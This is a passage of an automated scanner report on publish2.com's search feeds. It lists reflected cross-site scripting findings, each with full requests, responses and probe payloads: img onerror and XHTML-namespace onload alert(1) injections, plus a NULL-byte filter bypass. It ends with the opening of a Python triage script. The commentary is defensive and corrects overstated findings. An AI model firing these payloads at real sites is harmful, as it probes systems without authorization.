HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:44 GMT; path=/
Set-Cookie: kohanasession=1o0a8nd8cu1bq2qa4t1rg6m8u2; path=/
Set-Cookie: kohanasession=1o0a8nd8cu1bq2qa4t1rg6m8u2; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIxbzBhOG5kOGN1MWJxMnFhNHQxcmc2bTh1MiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNTs%3D; path=/
Content-Length: 690
Connection: close
Content-Type: application/json; charset=utf-8

jsonp1292504943065({"title":"Publish2 Links - newsgroup: jeff jarvis linksc22e5<img src=a onerror=alert(1)>24d8948e107, tag: wwgd, number_of_items: 5, callback: jsonp1292504943065","feedlink":"http:\/\/www.publish2.com\/search\/links.js?newsgroup=jeff+jarvis+linksc22e5<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

2.376. http://www.publish2.com/search/links.js [number_of_items parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.js

Issue detail

The value of the number_of_items request parameter is copied into the JSON response body, inside the title string value, without HTML or JSON escaping. The payload 55314<img%20src%3da%20onerror%3dalert(1)>4153ae7be26 was submitted in the number_of_items parameter. This input was echoed as 55314<img src=a onerror=alert(1)>4153ae7be26 in the application's response.

This proof-of-concept attack demonstrates that arbitrary markup, here an img element whose onerror handler carries the JavaScript, reaches the response unencoded, and that a parameter the application presumably expects to be numeric is not validated as such. The response is served as application/json, so the handler fires only where the body is rendered as HTML (a browser that sniffs the content type) or where a consumer writes the title into the DOM without escaping it. The unescaped reflection is the defect to fix either way.

Request

GET /search/links.js?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=555314<img%20src%3da%20onerror%3dalert(1)>4153ae7be26&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:46 GMT; path=/
Set-Cookie: kohanasession=65isubias4p31p7r47cihukc90; path=/
Set-Cookie: kohanasession=65isubias4p31p7r47cihukc90; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI2NWlzdWJpYXM0cDMxcDdyNDdjaWh1a2M5MCI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNzs%3D; path=/
Content-Length: 690
Connection: close
Content-Type: application/json; charset=utf-8

jsonp1292504943065({"title":"Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd, number_of_items: 555314<img src=a onerror=alert(1)>4153ae7be26, callback: jsonp1292504943065","feedlink":"http:\/\/www.publish2.com\/search\/links.js?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=555314<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

2.377. http://www.publish2.com/search/links.js [tag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.js

Issue detail

The value of the tag request parameter is copied into the JSON response body, inside the title string value, without HTML or JSON escaping. The payload c4543<img%20src%3da%20onerror%3dalert(1)>7b29acd748d was submitted in the tag parameter. This input was echoed as c4543<img src=a onerror=alert(1)>7b29acd748d in the application's response.

This proof-of-concept attack demonstrates that arbitrary markup, here an img element whose onerror handler carries the JavaScript, reaches the response unencoded. The response is served as application/json, so the handler fires only where the body is rendered as HTML (a browser that sniffs the content type) or where a consumer writes the title into the DOM without escaping it. The unescaped reflection is the defect to fix either way.

Request

GET /search/links.js?newsgroup=jeff+jarvis+links&tag=wwgdc4543<img%20src%3da%20onerror%3dalert(1)>7b29acd748d&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:45 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:45 GMT; path=/
Set-Cookie: kohanasession=lhie7od7am2r0k1rjor9phdq05; path=/
Set-Cookie: kohanasession=lhie7od7am2r0k1rjor9phdq05; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJsaGllN29kN2FtMnIwazFyam9yOXBoZHEwNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTQwNjs%3D; path=/
Content-Length: 690
Connection: close
Content-Type: application/json; charset=utf-8

jsonp1292504943065({"title":"Publish2 Links - newsgroup: jeff jarvis links, tag: wwgdc4543<img src=a onerror=alert(1)>7b29acd748d, number_of_items: 5, callback: jsonp1292504943065","feedlink":"http:\/\/www.publish2.com\/search\/links.js?newsgroup=jeff+jarvis+links&tag=wwgdc4543<img%20src%3da%20onerror%3dalert(1)>
...[SNIP]...

2.378. http://www.publish2.com/search/links.rss [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.rss

Issue detail

The value of the callback request parameter is copied into the RSS XML document, inside the CDATA section of the channel title, without escaping. The payload fe996<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6a0e24ab617 was submitted in the callback parameter. This input was echoed as fe996<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6a0e24ab617 in the application's response.

The response is XML, which a browser does not by default process as HTML. The scanner's proof of concept injects elements that declare the XHTML namespace, which tricks some browsers (including Firefox) into processing part of a standalone XML response as HTML; it is designed to execute when the browser loads the response directly, not when the XML is consumed by a script within another page.

In this response, however, the reflection lands inside a <![CDATA[ ... ]]> section, so an XML parser treats the injected <a> and <a:body> as character data rather than elements: the proof of concept as submitted creates no namespace, and the onload handler does not run on direct load. Treat the finding as an unescaped reflection into the feed, which still has to be fixed by XML-escaping the value (or by not wrapping untrusted text in CDATA), rather than as confirmed script execution.

Request

GET /search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=5&callback=jsonp1292504943065fe996<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6a0e24ab617 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:38 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:38 GMT; path=/
Set-Cookie: kohanasession=f89rm5pjn8ii21t103vgit9li1; path=/
Set-Cookie: kohanasession=f89rm5pjn8ii21t103vgit9li1; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJmODlybTVwam44aWkyMXQxMDN2Z2l0OWxpMSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5OTs%3D; path=/
Content-Length: 1346
Connection: close
Content-Type: application/rss+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd, number_of_items: 5, callback: jsonp1292504943065fe996<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6a0e24ab617]]>
...[SNIP]...

2.379. http://www.publish2.com/search/links.rss [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.publish2.com
Path:   /search/links.rss

Issue detail

The name of an arbitrarily supplied request parameter is copied into the RSS XML document, inside the CDATA section of the channel link element, without escaping. The payload %004f739<a>c8fee2c080 was submitted as the name of an arbitrarily supplied request parameter, and 4f739<a>c8fee2c080 appears in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The scanner reports that the application blocks certain characters that are often used in XSS attacks and that submitting a URL-encoded NULL byte (%00) anywhere before those characters circumvents the block. Verify this before relying on it: the link value in the response below reproduces the raw query string with %00 still encoded, so in this instance the <a> tag was reflected without the NULL byte being decoded, and the same request without %00 should be compared.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /search/links.rss?%004f739<a>c8fee2c080=1 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:36 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:36 GMT; path=/
Set-Cookie: kohanasession=prs7auoe19rcsg6csh64hs4gu1; path=/
Set-Cookie: kohanasession=prs7auoe19rcsg6csh64hs4gu1; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJwcnM3YXVvZTE5cmNzZzZjc2g2NGhzNGd1MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5Nzs%3D; path=/
Content-Length: 4390
Connection: close
Content-Type: application/rss+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title><![CDATA[Publish2 Links]]></title>
<link><![CDATA[http://www.publish2.com/search/links.rss?%004f739<a>c8fee2c080=1]]>
...[SNIP]...

2.380. http://www.publish2.com/search/links.rss [newsgroup parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.rss

Issue detail

The value of the newsgroup request parameter is copied into the RSS XML document, inside the CDATA section of the channel title, without escaping. The payload 1c4e8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>75a8caa1d8c was submitted in the newsgroup parameter. This input was echoed as 1c4e8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>75a8caa1d8c in the application's response.

The response is XML, which a browser does not by default process as HTML. The scanner's proof of concept injects elements that declare the XHTML namespace, which tricks some browsers (including Firefox) into processing part of a standalone XML response as HTML; it is designed to execute when the browser loads the response directly, not when the XML is consumed by a script within another page.

In this response, however, the reflection lands inside a <![CDATA[ ... ]]> section, so an XML parser treats the injected <a> and <a:body> as character data rather than elements: the proof of concept as submitted creates no namespace, and the onload handler does not run on direct load. Treat the finding as an unescaped reflection into the feed, which still has to be fixed by XML-escaping the value (or by not wrapping untrusted text in CDATA), rather than as confirmed script execution.

Request

GET /search/links.rss?newsgroup=jeff+jarvis+links1c4e8<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>75a8caa1d8c&tag=wwgd&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/
Set-Cookie: kohanasession=uspk6o0t8gpbs235fd6qp5bav6; path=/
Set-Cookie: kohanasession=uspk6o0t8gpbs235fd6qp5bav6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJ1c3BrNm8wdDhncGJzMjM1ZmQ2cXA1YmF2NiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5ODs%3D; path=/
Content-Length: 1346
Connection: close
Content-Type: application/rss+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links1c4e8<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>75a8caa1d8c, tag: wwgd, number_of_items: 5, callback: jsonp1292504943065]]>
...[SNIP]...

2.381. http://www.publish2.com/search/links.rss [number_of_items parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.rss

Issue detail

The value of the number_of_items request parameter is copied into the RSS XML document, inside the CDATA section of the channel title, without escaping; a parameter the application presumably expects to be numeric is not validated as such. The payload 99f44<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ca96b448bbd was submitted in the number_of_items parameter. This input was echoed as 99f44<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ca96b448bbd in the application's response.

The response is XML, which a browser does not by default process as HTML. The scanner's proof of concept injects elements that declare the XHTML namespace, which tricks some browsers (including Firefox) into processing part of a standalone XML response as HTML; it is designed to execute when the browser loads the response directly, not when the XML is consumed by a script within another page.

In this response, however, the reflection lands inside a <![CDATA[ ... ]]> section, so an XML parser treats the injected <a> and <a:body> as character data rather than elements: the proof of concept as submitted creates no namespace, and the onload handler does not run on direct load. Treat the finding as an unescaped reflection into the feed, which still has to be fixed by XML-escaping the value (or by not wrapping untrusted text in CDATA), rather than as confirmed script execution.

Request

GET /search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd&number_of_items=599f44<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>ca96b448bbd&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/
Set-Cookie: kohanasession=3vdfeb65j81nbk6qkhjljv8uu1; path=/
Set-Cookie: kohanasession=3vdfeb65j81nbk6qkhjljv8uu1; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIzdmRmZWI2NWo4MW5iazZxa2hqbGp2OHV1MSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5ODs%3D; path=/
Content-Length: 1346
Connection: close
Content-Type: application/rss+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd, number_of_items: 599f44<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>ca96b448bbd, callback: jsonp1292504943065]]>
...[SNIP]...

2.382. http://www.publish2.com/search/links.rss [tag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.publish2.com
Path:   /search/links.rss

Issue detail

The value of the tag request parameter is copied into the RSS XML document, inside the CDATA section of the channel title, without escaping. The payload 5df20<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6be915f83ed was submitted in the tag parameter. This input was echoed as 5df20<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6be915f83ed in the application's response.

The response is XML, which a browser does not by default process as HTML. The scanner's proof of concept injects elements that declare the XHTML namespace, which tricks some browsers (including Firefox) into processing part of a standalone XML response as HTML; it is designed to execute when the browser loads the response directly, not when the XML is consumed by a script within another page.

In this response, however, the reflection lands inside a <![CDATA[ ... ]]> section, so an XML parser treats the injected <a> and <a:body> as character data rather than elements: the proof of concept as submitted creates no namespace, and the onload handler does not run on direct load. Treat the finding as an unescaped reflection into the feed, which still has to be fixed by XML-escaping the value (or by not wrapping untrusted text in CDATA), rather than as confirmed script execution.

Request

GET /search/links.rss?newsgroup=jeff+jarvis+links&tag=wwgd5df20<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>6be915f83ed&number_of_items=5&callback=jsonp1292504943065 HTTP/1.1
Host: www.publish2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: kohanasession=cu27eumn4jg9orqicb0mpi8ra5; kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiJjdTI3ZXVtbjRqZzlvcnFpY2IwbXBpOHJhNSI7dG90YWxfaGl0c3xpOjY7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6MTE5OiJNb3ppbGxhLzUuMCAoV2luZG93czsgVTsgV2luZG93cyBOVCA2LjE7IGVuLVVTKSBBcHBsZVdlYktpdC81MzQuMTAgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvOC4wLjU1Mi4yMjQgU2FmYXJpLzUzNC4xMCI7aXBfYWRkcmVzc3xzOjE0OiIxNzQuMTIxLjIyMi4xOCI7bGFzdF9hY3Rpdml0eXxpOjEyOTI1MDUwMjA7;

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/
Set-Cookie: kohanasession=deleted; expires=Wed, 16-Dec-2009 13:16:37 GMT; path=/
Set-Cookie: kohanasession=1jv7guq9upt1t7gf4bh248trm5; path=/
Set-Cookie: kohanasession=1jv7guq9upt1t7gf4bh248trm5; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIxanY3Z3VxOXVwdDF0N2dmNGJoMjQ4dHJtNSI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDcuMDsgV2luZG93cyBOVCA2LjApIjtpcF9hZGRyZXNzfHM6MTQ6IjE3NC4xMjEuMjIyLjE4IjtsYXN0X2FjdGl2aXR5fGk6MTI5MjUwNTM5ODs%3D; path=/
Content-Length: 1346
Connection: close
Content-Type: application/rss+xml; charset=utf-8

<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title><![CDATA[Publish2 Links - newsgroup: jeff jarvis links, tag: wwgd5df20<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>6be915f83ed, number_of_items: 5, callback: jsonp1292504943065]]>
...[SNIP]...
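An added triage script (example code, not part of the scanner report or of Publish2's application) that automates the context check applied to the publish2.com findings in this section: given a payload and a raw response, it reports whether the payload came back verbatim, which Content-Type carries it, whether it landed in the JSONP callback prefix, inside a JSON string value or inside an XML CDATA section, and whether the XML parser actually produced an element in the XHTML namespace, which is what the namespace trick needs. The three embedded responses are constructed, abbreviated copies of the responses for findings 2.373, 2.377 and 2.382; the function names and verdict labels are this example's own.

```python
"""Triage of a reflected payload by the context it lands in (added example)."""
import json
import re
import xml.etree.ElementTree as ET
from typing import Dict, Tuple

XHTML_NS = "http://www.w3.org/1999/xhtml"
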